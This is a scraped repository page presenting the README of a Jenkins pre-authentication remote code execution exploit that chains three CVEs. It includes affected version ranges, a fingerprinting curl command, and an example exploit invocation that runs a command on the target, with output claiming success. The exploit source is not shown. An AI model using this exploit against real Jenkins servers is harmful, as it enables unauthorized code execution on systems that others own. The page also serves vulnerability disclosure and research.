Need help with awesome-jenkins-rce-2019?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

orangetw
502 Stars 119 Forks 9 Commits 2 Opened issues

Description

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

Services available

!
?

Need anything else?

Contributors list

# 45,932
Shell
PHP
Perl
5 commits
# 19,120
dirbust...
Python
netflix
dirsear...
1 commit
# 28,467
xxe
kali-li...
tpu
progres...
1 commit

awesome-jenkins-rce-2019

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Affect list

  • ANONYMOUS_READ disable

    • Jenkins version < 2.138
  • ANONYMOUS_READ enable(or with a normal user account)

    • Jenkins build time < 2019-01-28

Usage

$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw' [] ANONYMOUS_READ disable! [] Bypass with CVE-2018-1000861! [*] Exploit success!(it should be :P)

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enable
  • Jenkins 2.152 with ANONYMOUS_READ enable
  • Jenkins 2.153 with ANONYMOUS_READ enable
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Acknowledgements

Part slides from my HITB AMS 2019 talk:

1.png 2.png 3.png

References

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.